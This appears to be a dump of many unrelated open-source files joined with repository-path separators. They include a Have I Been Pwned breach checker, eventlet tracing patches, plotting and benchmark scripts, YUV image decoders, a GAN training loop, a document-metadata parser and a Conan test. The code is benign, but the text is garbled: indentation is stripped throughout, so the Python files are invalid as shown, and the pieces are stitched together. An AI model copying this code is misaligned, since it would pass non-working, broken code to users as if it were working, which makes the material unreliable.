# Copyright (c) 2018 Google Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
HEADER = """#include <string>
namespace media::audio {
// This is a char[] type because that requires no code to run
// initialization, so other constants can be initialized with
// this value.
//
// It is constexpr so that it can be used in the initialization
// of other constexprs.
static constexpr char %s[] =
"""
FOOTER = """
} // namespace media::audio
"""
def main():
if len(sys.argv) != 3:
print("Usage: %s <input_file> <output_file>" % (sys.argv[0],))
exit(-1)
lines = open(sys.argv[1], 'r').readlines()
out = open(sys.argv[2], 'w')
varname = re.sub(
'_([a-zA-Z0-9])', lambda m: m.group(1).upper(),
'k_' + os.path.splitext(os.path.split(sys.argv[1])[1])[0])
out.write(HEADER % (varname,))
for i in range(len(lines)):
l = lines[i].replace('\n', '') # Remove the trailing newline
l = re.sub('//.*', '', l) # Remove any comments
l = re.sub('(^\s+|\s+$)', '', l) # Remove leading/trailing whitespace
l = l.replace('\\', '\\\\') # Escape all fwd slash
l = l.replace('"', '\\"') # Escape all double-quotes
# Skip empty lines
if len(l) == 0:
continue
out.write(' "%s"' % (l,))
if ((i + 1) == len(lines)):
out.write(';\n')
else:
out.write('\n')
out.write(FOOTER)
out.close()
if __name__ == '__main__':
main()
|
packages/checker/haveibeenpwned.py | madstk1/leon | 9,211 | 12744837 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import utils
from time import sleep
from urllib import parse
from requests import codes, exceptions
# Developer token
apikey = utils.config('api_key')
def run(string, entities):
"""Verify if one or several email addresses have been pwned"""
emails = []
for item in entities:
if item['entity'] == 'email':
emails.append(item['resolution']['value'])
if not emails:
emails = utils.config('emails')
if not emails:
return utils.output('end', 'no-email', utils.translate('no-email'))
utils.output('inter', 'checking', utils.translate('checking'))
for index, email in enumerate(emails):
isLastEmail = index == len(emails) - 1
breached = checkForBreach(email)
data = { 'email': email }
# Have I Been Pwned API returns a 403 when accessed by unauthorized/banned clients
if breached == 403:
return utils.output('end', 'blocked', utils.translate('blocked', { 'website_name': 'Have I Been Pwned' }))
elif breached == 503:
return utils.output('end', 'blocked', utils.translate('unavailable', { 'website_name': 'Have I Been Pwned' }))
elif not breached:
if isLastEmail:
return utils.output('end', 'no-pwnage', utils.translate('no-pwnage', data))
else:
utils.output('inter', 'no-pwnage', utils.translate('no-pwnage', data))
else:
data['result'] = ''
for index, b in enumerate(breached):
data['result'] += utils.translate('list_element', {
'url': 'http://' + b['Domain'],
'name': b['Name'],
'total': b['PwnCount']
}
)
if isLastEmail:
return utils.output('end', 'pwned', utils.translate('pwned', data))
else:
utils.output('inter', 'pwned', utils.translate('pwned', data))
def checkForBreach(email):
# Delay for 2 seconds before making request to accomodate API usage policy
sleep(2)
truncate = '?truncateResponse=true'
url = 'https://haveibeenpwned.com/api/v3/breachedaccount/' + parse.quote_plus(email)
try:
response = utils.http('GET', url, { 'hibp-api-key': apikey })
if response.status_code == 404:
return None
elif response.status_code == 200:
return response.json()
return response.status_code
except exceptions.RequestException as e:
return utils.output('end', 'down', utils.translate('errors', { 'website_name': 'Have I Been Pwned' }))
|
eventlet/zipkin/greenthread.py | li-caspar/eventlet_0.30.2 | 5,079 | 12744843 | <reponame>li-caspar/eventlet_0.30.2
from eventlet import greenthread
from eventlet.zipkin import api
__original_init__ = greenthread.GreenThread.__init__
__original_main__ = greenthread.GreenThread.main
def _patched__init(self, parent):
# parent thread saves current TraceData from tls to self
if api.is_tracing():
self.trace_data = api.get_trace_data()
__original_init__(self, parent)
def _patched_main(self, function, args, kwargs):
# child thread inherits TraceData
if hasattr(self, 'trace_data'):
api.set_trace_data(self.trace_data)
__original_main__(self, function, args, kwargs)
def patch():
greenthread.GreenThread.__init__ = _patched__init
greenthread.GreenThread.main = _patched_main
def unpatch():
greenthread.GreenThread.__init__ = __original_init__
greenthread.GreenThread.main = __original_main__
|
src/python/example/gudhi_graphical_tools_example.py | gtauzin/gudhi-devel | 146 | 12744863 | <filename>src/python/example/gudhi_graphical_tools_example.py
#!/usr/bin/env python
import matplotlib.pyplot as plot
import gudhi
""" This file is part of the Gudhi Library - https://gudhi.inria.fr/ - which is released under MIT.
See file LICENSE or go to https://gudhi.inria.fr/licensing/ for full license details.
Author(s): <NAME>
Copyright (C) 2016 Inria
Modification(s):
- YYYY/MM Author: Description of the modification
"""
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2016 Inria"
__license__ = "MIT"
print("#####################################################################")
print("Show barcode persistence example")
persistence = [
(2, (1.0, float("inf"))),
(1, (1.4142135623730951, float("inf"))),
(1, (1.4142135623730951, float("inf"))),
(0, (0.0, float("inf"))),
(0, (0.0, 1.0)),
(0, (0.0, 1.0)),
(0, (0.0, 1.0)),
]
gudhi.plot_persistence_barcode(persistence)
plot.show()
print("#####################################################################")
print("Show diagram persistence example")
gudhi.plot_persistence_diagram(persistence)
plot.show()
print("#####################################################################")
print("Show diagram persistence example with a confidence band")
gudhi.plot_persistence_diagram(persistence, band=0.2)
plot.show()
print("#####################################################################")
print("Show barcode and diagram persistence side by side example")
fig, axes = plot.subplots(nrows=1, ncols=2)
gudhi.plot_persistence_barcode(persistence, axes = axes[0])
gudhi.plot_persistence_diagram(persistence, axes = axes[1])
fig.suptitle("barcode versus diagram")
plot.show()
|
webrecorder/webrecorder/appcontroller.py | ssteo/webrecorder | 1,217 | 12744867 | <filename>webrecorder/webrecorder/appcontroller.py
from webrecorder.basecontroller import BaseController
from webrecorder.models.importer import ImportStatusChecker
# ============================================================================
class AppController(BaseController):
def __init__(self, *args, **kwargs):
super(AppController, self).__init__(*args, **kwargs)
config = kwargs['config']
# Auto Import on Init Id
self.init_import_id = config.get('init_import_id')
self.init_import_username = config.get('init_import_user')
self.init_import_coll_name = config.get('init_import_coll')
def init_routes(self):
@self.app.get(['/', '/index.html'])
@self.jinja2_view('index.html', refresh_cookie=False)
def home_page():
self.redir_host()
resp = {'is_home': '1'}
if self.init_import_id:
return self.handle_player_load(resp)
if not self.access.session_user.is_anon():
coll_list = self.access.session_user.get_collections()
resp['collections'] = [coll.serialize() for coll in coll_list]
resp['coll_title'] = ''
resp['rec_title'] = ''
else:
self.fill_anon_info(resp)
return resp
@self.app.get('/_faq')
@self.jinja2_view('faq.html')
def faq():
return {}
@self.app.get('/_documentation')
@self.jinja2_view('howtoguide.html')
def documentation():
return {}
@self.app.get('/_policies')
@self.jinja2_view('policies.html')
def policies():
return {}
# Expiry Message
@self.app.route('/_expire')
def expire():
self.flash_message('Sorry, the anonymous collection has expired due to inactivity')
self.redirect('/')
def handle_player_load(self, resp):
""" Initial warc load for player
"""
user = self.user_manager.all_users[self.init_import_username]
status_checker = ImportStatusChecker(self.redis)
upload_status = status_checker.get_upload_status(user, self.init_import_id)
# if upload already finished, redirect to known coll
if not upload_status or upload_status.get('done'):
if user and self.init_import_coll_name:
self.redirect('/' + user.name + '/' + self.init_import_coll_name)
resp['upload_status'] = upload_status or {}
return resp
|
datashader/tests/benchmarks/test_draw_line.py | goncaloperes/datashader | 706 | 12744887 | from __future__ import division
import sys
import pytest
import numpy as np
from datashader.glyphs import Glyph
from datashader.glyphs.line import _build_draw_segment, \
_build_map_onto_pixel_for_line
from datashader.utils import ngjit
py2_skip = pytest.mark.skipif(sys.version_info.major < 3, reason="py2 not supported")
mapper = ngjit(lambda x: x)
map_onto_pixel = _build_map_onto_pixel_for_line(mapper, mapper)
sx, tx, sy, ty = 1, 0, 1, 0
xmin, xmax, ymin, ymax = 0, 5, 0, 5
@pytest.fixture
def draw_line():
@ngjit
def append(i, x, y, agg):
agg[y, x] += 1
expand_aggs_and_cols = Glyph._expand_aggs_and_cols(append, 1)
return _build_draw_segment(append, map_onto_pixel, expand_aggs_and_cols,
False)
@py2_skip
@pytest.mark.benchmark(group="draw_line")
def test_draw_line_left_border(benchmark, draw_line):
n = 10**4
x0, y0 = (0, 0)
x1, y1 = (0, n)
agg = np.zeros((n+1, n+1), dtype='i4')
benchmark(draw_line, sx, tx, sy, ty, xmin, xmax, ymin, ymax, x0, y0, x1, y1, 0, True, agg)
@py2_skip
@pytest.mark.benchmark(group="draw_line")
def test_draw_line_diagonal(benchmark, draw_line):
n = 10**4
x0, y0 = (0, 0)
x1, y1 = (n, n)
agg = np.zeros((n+1, n+1), dtype='i4')
benchmark(draw_line, sx, tx, sy, ty, xmin, xmax, ymin, ymax, x0, y0, x1, y1, 0, True, agg)
@py2_skip
@pytest.mark.benchmark(group="draw_line")
def test_draw_line_offset(benchmark, draw_line):
n = 10**4
x0, y0 = (0, n//4)
x1, y1 = (n, n//4-1)
agg = np.zeros((n+1, n+1), dtype='i4')
benchmark(draw_line, sx, tx, sy, ty, xmin, xmax, ymin, ymax, x0, y0, x1, y1, 0, True, agg)
|
data/models/base.py | pombredanne/vulncode-db | 592 | 12744891 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from itertools import zip_longest
from typing import Dict, Tuple, Any, Union, Optional, List
from flask_marshmallow import Marshmallow # type: ignore
from flask_sqlalchemy import DefaultMeta # type: ignore
from flask_sqlalchemy import SQLAlchemy as SQLAlchemyBase
from sqlalchemy import Index, Column, Integer, func, DateTime, inspect
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import Mapper, RelationshipProperty
from sqlalchemy.orm.attributes import History
from sqlalchemy.orm.interfaces import MapperProperty
from sqlalchemy.orm.state import InstanceState, AttributeState
log = logging.getLogger(__name__)
# Adding the "pool_pre_ping" command to avoid mysql server has gone away issues.
# Note: This will slightly degrade performance. It might be better to adjust
# MariaDB server settings.
class SQLAlchemy(SQLAlchemyBase):
def apply_pool_defaults(self, app, options):
options = super().apply_pool_defaults(app, options)
options["pool_pre_ping"] = True
return options
db = SQLAlchemy()
ma = Marshmallow() # pylint: disable=invalid-name
BaseModel: DefaultMeta = db.Model
ChangeUnion = Union[Tuple[Any, Any], Dict[str, Any], List[Any]]
Changes = Dict[str, ChangeUnion]
class MainBase(BaseModel):
# N.B. We leave the schema out on purpose as alembic gets confused
# otherwise. The default schema is already main (as specified in the
# connection string). Also see:
# https://github.com/sqlalchemy/alembic/issues/519#issuecomment-442533633
# __table_args__ = {'schema': 'main'}
__abstract__ = True
id = Column(Integer, autoincrement=True, primary_key=True)
date_created = Column(DateTime, default=func.current_timestamp())
date_modified = Column(
DateTime,
default=func.current_timestamp(),
onupdate=func.current_timestamp(),
)
def model_changes(self, *, already_tested=None) -> Changes:
"""Returns the changed attributes of this instance.
Returns:
a dictionary mapping the attributes to (new, old) tuples or a
recursive version if the attribute is a list or reference.
"""
def inner(current) -> Optional[Union[List[Any], Changes]]:
if isinstance(current, list):
res = [inner(item) for item in current]
if any(res):
return res
elif hasattr(current, "model_changes"):
return current.model_changes(already_tested=already_tested)
return None
changes: Changes = {}
if already_tested is None:
already_tested = {id(self)}
elif id(self) in already_tested:
return changes
already_tested.add(id(self))
state: InstanceState = inspect(self)
attr: AttributeState
for name, attr in state.attrs.items():
hist: History = attr.load_history()
if hist.has_changes():
changes[name] = hist[0], hist[2]
else:
subchanges = inner(getattr(self, name))
if subchanges:
changes[name] = subchanges
return changes
def diff(self, other: BaseModel, *, already_tested=None) -> Changes:
"""Returns the difference between this instance and the given one.
Returns:
a dictionary mapping the attributes to (new, old) tuples or a
recursive version if the attribute is a list or reference.
"""
changes: Changes = {}
if already_tested is None:
already_tested = {id(self), id(other)}
elif id(self) in already_tested and id(other) in already_tested:
return changes
already_tested.add(id(self))
already_tested.add(id(other))
if id(self) == id(other): # identity cache
log.warning("Comparing the same instance (%r). Identity cache?", self)
return self.model_changes()
clz = type(self)
oclz = type(other)
if not isinstance(other, clz):
raise TypeError(
"Instance of {} expected. Got {}".format(clz.__name__, oclz.__name__)
)
def innerdiff(current, other) -> Optional[ChangeUnion]:
if current is None and other is None:
return None
if current is None or other is None:
return (current, other)
if hasattr(current, "diff"):
return current.diff(other, already_tested=already_tested)
if isinstance(current, list) and isinstance(other, list):
res = []
for cur, oth in zip_longest(current, other):
res.append(innerdiff(cur, oth))
if all(res):
return res
elif current != other:
return (current, other)
return None
mapper: Mapper = inspect(clz)
name: str
attr: MapperProperty
for name, attr in mapper.attrs.items(): # type: ignore
# log.debug('Compare %s of %s <> %s', name, clz, oclz)
other_value = getattr(other, name)
current_value = getattr(self, name)
if isinstance(attr, RelationshipProperty) and other_value is None:
for col in attr.local_columns:
cname = col.name
if innerdiff(getattr(self, cname), getattr(other, cname)):
break
else:
continue
if name in changes:
continue
subchanges = innerdiff(current_value, other_value)
if subchanges:
changes[name] = subchanges
return changes
class NvdBase(BaseModel):
__abstract__ = True
@declared_attr
def __table_args__(cls): # pylint: disable=no-self-argument
indices = []
idx_format = "idx_{tbl_name}_{col_name}"
for key in cls.__dict__:
attribute = cls.__dict__[key]
# pylint: disable=no-member
if not isinstance(attribute, db.Column) or not attribute.index:
continue
# pylint: enable=no-member
# Disable Index
attribute.index = None
# Create a custom index here.
indices.append(
Index(idx_format.format(tbl_name=cls.__tablename__, col_name=key), key)
)
indices.append({"schema": "cve"})
return tuple(indices)
class CweBase(BaseModel):
__table_args__ = {"schema": "cwe"}
__abstract__ = True
|
tests/test_chi_land_trust.py | MAYANK25402/city-scrapers | 255 | 12744914 | from datetime import datetime
from operator import itemgetter
from os.path import dirname, join
import pytest # noqa
from city_scrapers_core.constants import BOARD, PASSED
from city_scrapers_core.utils import file_response
from freezegun import freeze_time
from city_scrapers.spiders.chi_land_trust import ChiLandTrustSpider
test_response = file_response(
join(dirname(__file__), "files", "chi_land_trust.html"),
url="https://www.chicago.gov/city/en/depts/doh/supp_info/chicago_communitylandtrust0.html", # noqa
)
spider = ChiLandTrustSpider()
freezer = freeze_time("2019-07-11")
freezer.start()
parsed_items = sorted(
[item for item in spider.parse(test_response)], key=itemgetter("start")
)
freezer.stop()
def test_count():
assert len(parsed_items) == 13
def test_title():
assert parsed_items[-6]["title"] == "Board of Directors"
def test_description():
assert parsed_items[-6]["description"] == ""
def test_start():
assert parsed_items[-6]["start"] == datetime(2019, 2, 7, 9, 0)
def test_end():
assert parsed_items[-6]["end"] is None
def test_time_notes():
assert parsed_items[-6]["time_notes"] == "See agenda to confirm time"
def test_id():
assert parsed_items[-6]["id"] == "chi_land_trust/201902070900/x/board_of_directors"
def test_status():
assert parsed_items[-6]["status"] == PASSED
def test_location():
assert parsed_items[-6]["location"] == spider.location
def test_source():
assert (
parsed_items[-6]["source"]
== "https://www.chicago.gov/city/en/depts/doh/supp_info/chicago_communitylandtrust0.html" # noqa
)
def test_links():
assert parsed_items[-6]["links"] == [
{
"href": "https://www.chicago.gov/content/dam/city/depts/doh/general/CCLT_February_2019_Agernda.pdf", # noqa
"title": "Agenda",
}
]
def test_classification():
assert parsed_items[-6]["classification"] == BOARD
def test_all_day():
assert parsed_items[-6]["all_day"] is False
|
ops.py | Gengarrr/Relation-Network-Tensorflow | 267 | 12744940 | import tensorflow as tf
import tensorflow.contrib.slim as slim
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
def selu(x):
alpha = 1.6732632423543772848170429916717
scale = 1.0507009873554804934193349852946
return scale * tf.where(x > 0.0, x, alpha * tf.exp(x) - alpha)
def huber_loss(labels, predictions, delta=1.0):
residual = tf.abs(predictions - labels)
condition = tf.less(residual, delta)
small_res = 0.5 * tf.square(residual)
large_res = delta * residual - 0.5 * tf.square(delta)
return tf.where(condition, small_res, large_res)
def conv2d(input, output_shape, is_train, activation_fn=tf.nn.relu,
k_h=5, k_w=5, s_h=2, s_w=2, stddev=0.02, name="conv2d"):
with tf.variable_scope(name):
w = tf.get_variable('w', [k_h, k_w, input.get_shape()[-1], output_shape],
initializer=tf.truncated_normal_initializer(stddev=stddev))
conv = tf.nn.conv2d(input, w, strides=[1, s_h, s_w, 1], padding='SAME')
biases = tf.get_variable('biases', [output_shape],
initializer=tf.constant_initializer(0.0))
activation = activation_fn(conv + biases)
bn = tf.contrib.layers.batch_norm(activation, center=True, scale=True,
decay=0.9, is_training=is_train,
updates_collections=None)
return bn
def fc(input, output_shape, activation_fn=tf.nn.relu, name="fc"):
output = slim.fully_connected(input, int(output_shape), activation_fn=activation_fn)
return output
|
common/slow.py | spao234/wpt | 575 | 12744948 | <filename>common/slow.py
import time
def main(request, response):
time.sleep(2)
return 200, [], b''
|
VSR/DataLoader/YVDecoder.py | Kadantte/VideoSuperResolution | 1,447 | 12744959 | <reponame>Kadantte/VideoSuperResolution
# Copyright (c) 2017-2020 <NAME>.
# Author: <NAME>
# Email: <EMAIL>
# Update: 2020 - 2 - 7
# Image customized decoder for YV12([Y][U/4][V/4]), YV21([Y][V/4][U/4])
# NOTE: [Y][U][V] means Y/U/V channel is a planar channel, [U/4] means
# U channel is sub-sampled by a factor of [2, 2]
import numpy as np
from PIL import ImageFile
class YV12Decoder(ImageFile.PyDecoder):
"""PIL.Image.DECODERS for YV12 format raw bytes
Registered in `Image.DECODERS`, don't use this class directly!
"""
def __init__(self, mode, *args):
super(YV12Decoder, self).__init__(mode, *args)
def decode(self, buffer):
if self.mode == 'L':
# discard UV channel
self.set_as_raw(buffer, 'L')
else:
w, h = self.im.size
y = np.frombuffer(buffer, 'uint8', count=w * h)
u = np.frombuffer(buffer, 'uint8', count=w * h // 4, offset=w * h)
v = np.frombuffer(
buffer, 'uint8', count=w * h // 4, offset=w * h + w * h // 4)
y = np.reshape(y, [h, w])
u = np.reshape(u, [h // 2, w // 2])
v = np.reshape(v, [h // 2, w // 2])
u = u[np.arange(h) // 2][:, np.arange(w) // 2]
v = v[np.arange(h) // 2][:, np.arange(w) // 2]
yuv = np.stack([y, u, v], axis=-1)
self.set_as_raw(yuv.flatten().tobytes())
return -1, 0
class YV21Decoder(ImageFile.PyDecoder):
"""PIL.Image.DECODERS for YV21 format raw bytes
Registered in `Image.DECODERS`, don't use this class directly!
"""
def __init__(self, mode, *args):
super(YV21Decoder, self).__init__(mode, *args)
def decode(self, buffer):
if self.mode == 'L':
# discard UV channel
self.set_as_raw(buffer, 'L')
else:
w, h = self.im.size
y = np.frombuffer(buffer, 'uint8', count=w * h)
v = np.frombuffer(buffer, 'uint8', count=w * h // 4, offset=w * h)
u = np.frombuffer(
buffer, 'uint8', count=w * h // 4, offset=w * h + w * h // 4)
y = np.reshape(y, [h, w])
u = np.reshape(u, [h // 2, w // 2])
v = np.reshape(v, [h // 2, w // 2])
u = u[np.arange(h) // 2][:, np.arange(w) // 2]
v = v[np.arange(h) // 2][:, np.arange(w) // 2]
yuv = np.stack([y, u, v], axis=-1)
self.set_as_raw(yuv.flatten().tobytes())
return -1, 0
|
litex/soc/cores/dna.py | osterwood/litex | 1,501 | 12744988 | <filename>litex/soc/cores/dna.py
#
# This file is part of LiteX.
#
# Copyright (c) 2014-2015 <NAME> <<EMAIL>>
# SPDX-License-Identifier: BSD-2-Clause
from migen import *
from litex.soc.interconnect.csr import *
# Xilinx DNA (Device Identifier) -------------------------------------------------------------------
class DNA(Module, AutoCSR):
def __init__(self):
n = 57
self._id = CSRStatus(n)
# # #
self.do = do = Signal()
self.count = count = Signal(max=2*n + 1)
self.clk = clk = Signal()
self.comb += clk.eq(count[0])
self.specials += Instance("DNA_PORT",
i_DIN = self._id.status[-1],
o_DOUT = do,
i_CLK = clk,
i_READ = count < 2,
i_SHIFT = 1
)
self.sync += [
If(count < 2*n,
count.eq(count + 1),
If(clk,
self._id.status.eq(Cat(do, self._id.status))
)
)
]
def add_timing_constraints(self, platform, sys_clk_freq, sys_clk):
platform.add_period_constraint(self.clk, 2*1e9/sys_clk_freq)
platform.add_false_path_constraints(self.clk, sys_clk)
|
train_oneside.py | SachinKumar105/Implicit-Competitive-Regularization | 107 | 12744991 | import os
import csv
import time
import math
import pandas as pd
import torch
import torch.nn as nn
import torchvision.utils as vutils
from torch.optim.sgd import SGD
from torch.utils.data import DataLoader
from optims import OCGD, BCGD2
from train_utils import get_data, weights_init_d, weights_init_g, \
get_diff, save_checkpoint, lr_scheduler, generate_data, icrScheduler, get_model
from losses import get_loss
# seed = torch.randint(0, 1000000, (1,))
seed = 2020
torch.manual_seed(seed=seed)
print('random seed : %d' % seed)
def train_ocgd(epoch_num=10, optim_type='BCGD2',
startPoint=None, logdir='test',
update_min=True,
z_dim=128, batchsize=64,
loss_name='WGAN', model_name='dc',
data_path='None', dataname='cifar10',
device='cpu', gpu_num=1, collect_info=False):
lr_d = 0.01
lr_g = 0.01
dataset = get_data(dataname=dataname, path='../datas/%s' % data_path)
dataloader = DataLoader(dataset=dataset, batch_size=batchsize, shuffle=True,
num_workers=4)
D, G = get_model(model_name=model_name, z_dim=z_dim)
D.to(device)
G.to(device)
if startPoint is not None:
chk = torch.load(startPoint)
D.load_state_dict(chk['D'])
G.load_state_dict(chk['G'])
print('Start from %s' % startPoint)
optimizer = OCGD(max_params=G.parameters(), min_params=D.parameters(),
udpate_min=update_min, device=device)
loss_list = []
count = 0
for e in range(epoch_num):
for real_x in dataloader:
real_x = real_x[0].to(device)
d_real = D(real_x)
z = torch.randn((real_x.shape[0], z_dim), device=device)
fake_x = G(z)
d_fake = D(fake_x)
D_loss = get_loss(name=loss_name, g_loss=False, d_real=d_real, d_fake=d_fake)
optimizer.zero_grad()
optimizer.step(loss=D_loss)
if count % 100 == 0:
print('Iter %d, Loss: %.5f' % (count, D_loss.item()))
loss_list.append(D_loss.item())
count += 1
print('epoch{%d/%d}' %(e, epoch_num))
name = 'overtrainD.pth' if update_min else 'overtrainG.pth'
save_checkpoint(path=logdir, name=name, D=D, G=G)
loss_data = pd.DataFrame(loss_list)
loss_data.to_csv('logs/train_oneside.csv')
if __name__ == '__main__':
torch.backends.cudnn.benchmark = True
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print(device)
chk = 'checkpoints/0.00000MNIST-0.0100/SGD-0.01000_9000.pth'
train_ocgd(epoch_num=10, startPoint=chk,
z_dim=96, update_min=True,
data_path='mnist', dataname='MNIST',
loss_name='JSD', model_name='mnist',
batchsize=128, device=device) |
tests/integration_tests/util.py | trailofbits/mcsema | 1,301 | 12744996 | # Copyright (c) 2020 Trail of Bits, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
def strip_whole_config(filename):
if not filename.endswith(".config"):
return ""
filename = filename.rstrip(".config")
basename, ext = os.path.splitext(filename)
return basename
def get_binaries(directory):
result = set()
for f in os.listdir(directory):
filename = strip_whole_config(f)
if filename:
result.add(filename)
return result
def get_tags(config):
with open(config, 'r') as f:
line = f.readline().rstrip('\n')
tokens = line.split(' ')
if tokens[0] != 'TAGS:':
return []
return tokens[1:]
def get_bin2tags(directory):
result = {}
for f in os.listdir(directory):
filename = strip_whole_config(f)
if not filename:
continue
tags = get_tags(os.path.join(directory, f))
if filename not in result:
result[filename] = tags
else:
result[filename].append(tags)
return result
def get_cfg(directory, name):
return os.path.join(directory, name + '.cfg')
|
.modules/.metagoofil/extractors/metadataOpenOffice.py | termux-one/EasY_HaCk | 1,103 | 12744998 | import unzip
import zipfile
import sys
import re
import os
import random
class metaInfoOO:
def __init__(self):
self.version =""
self.generator=""
self.creationDate=""
self.date=""
self.language=""
self.editingCycles=""
self.editingDuration=""
self.tableCount=""
self.imageCount=""
self.objectCount=""
self.pageCount=""
self.paragraphCount=""
self.wordCount=""
self.characterCount=""
self.initialCreator=""
self.creator=""
self.title=""
self.description=""
self.subject=""
self.printedBy=""
self.printDate=""
def __init__(self,filepath):
self.version =""
self.generator=""
self.creationDate=""
self.date=""
self.language=""
self.editingCycles=""
self.editingDuration=""
self.tableCount=""
self.imageCount=""
self.objectCount=""
self.pageCount=""
self.paragraphCount=""
self.wordCount=""
self.characterCount=""
self.initialCreator=""
self.creator=""
self.title=""
self.description=""
self.subject=""
self.printedBy=""
self.printDate=""
rnd = str(random.randrange(0, 1001, 3))
zip = zipfile.ZipFile(filepath, 'r')
file('meta'+rnd+'.xml', 'w').write(zip.read('meta.xml'))
zip.close()
# done, ahora a currar con el xml
f = open ('meta'+rnd+'.xml','r')
meta = f.read()
self.carga(meta)
f.close()
os.remove('meta'+rnd+'.xml')
def toString(self):
print "--- Metadata ---"
print " version: " + str(self.version)
print " generator: " + str(self.generator)
print " creation-date: "+ str(self.creationDate)
print " date: "+ str(self.date)
print " language: "+ str(self.language)
print " editing cycles: "+ str(self.editingCycles)
print " editing duration: "+ str(self.editingDuration)
print " table count: "+ str(self.tableCount)
print " image count: "+ str(self.imageCount)
print " object count: " + str(self.objectCount)
print " page count: "+ str(self.pageCount)
print " paragraph count: " + str(self.paragraphCount)
print " word count: "+ str(self.wordCount)
print " character count:" + str(self.characterCount)
print " initial creator:" + str(self.initialCreator)
print " creator:" + str(self.creator)
print " title:" + str(self.title)
print " description:" + str(self.description)
print " subject:" + str(self.subject)
print " printed by:" + str(self.printedBy)
print " print date:" + str(self.printDate)
def carga(self,datos):
try:
p = re.compile('office:version="([\d.]*)"><office:meta>')
self.version = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:generator>(.*)</meta:generator>')
self.generator = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:creation-date>(.*)</meta:creation-date>')
self.creationDate = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:date>(.*)</dc:date>')
self.date = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:language>(.*)</dc:language>')
self.language = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:editing-cycles>(.*)</meta:editing-cycles>')
self.editingCycles = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:editing-duration>(.*)</meta:editing-duration>')
self.editingDuration = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:table-count="(\d*)"')
self.tableCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:image-count="(\d*)"')
self.imageCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:object-count="(\d*)"')
self.objectCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:page-count="(\d*)"')
self.pageCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:paragraph-count="(\d*)"')
self.paragraphCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:word-count="(\d*)"')
self.wordCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('meta:character-count="(\d*)"')
self.characterCount = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:initial-creator>(.*)</meta:initial-creator>')
self.initialCreator = str (p.findall(datos,re.DOTALL)[0])
except:
pass
try:
p = re.compile('<dc:creator>(.*)</dc:creator>')
self.creator = str (p.findall(datos,re.DOTALL)[0])
except:
pass
try:
p = re.compile('<dc:title>(.*)</dc:title>')
self.title = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:description>(.*)</dc:description>')
self.description = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<dc:subject>(.*)</dc:subject>')
self.subject = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:printed-by>(.*)</meta:printed-by>')
self.printedBy = str (p.findall(datos)[0])
except:
pass
try:
p = re.compile('<meta:print-date>(.*)</meta:print-date>')
self.printDate = str (p.findall(datos)[0])
except:
pass
|
recipes/m4/all/test_package/conanfile.py | rockandsalt/conan-center-index | 562 | 12745006 | <gh_stars>100-1000
from conans import ConanFile, tools
from conans.errors import ConanException
from io import StringIO
import os
import textwrap
class TestPackageConan(ConanFile):
settings = "os", "arch", "compiler", "build_type"
@property
def _m4_input_path(self):
return os.path.join(self.build_folder, "input.m4")
def build(self):
tools.save(self._m4_input_path, textwrap.dedent("""\
m4_define(NAME1, `<NAME>.')
m4_define(NAME2, `Sally')
m4_define(MET, `$1 met $2')
MET(`NAME1', `NAME2')
"""))
def test(self):
if hasattr(self, "settings_build"):
exe_suffix = ".exe" if self.settings.os == "Windows" else ""
m4_bin = os.path.join(self.deps_cpp_info["m4"].rootpath, "bin", "m4" + exe_suffix)
else:
m4_bin = tools.get_env("M4")
if m4_bin is None or not m4_bin.startswith(self.deps_cpp_info["m4"].rootpath):
raise ConanException("M4 environment variable not set")
if not tools.cross_building(self, skip_x64_x86=True):
self.run("{} --version".format(m4_bin), run_environment=True)
self.run("{} -P {}".format(m4_bin, self._m4_input_path))
self.run("m4 -R {0}/frozen.m4f {0}/test.m4".format(self.source_folder), run_environment=True)
output = StringIO()
self.run("{} -P {}".format(m4_bin, self._m4_input_path), output=output)
assert "<NAME>. met Sally" in output.getvalue()
|
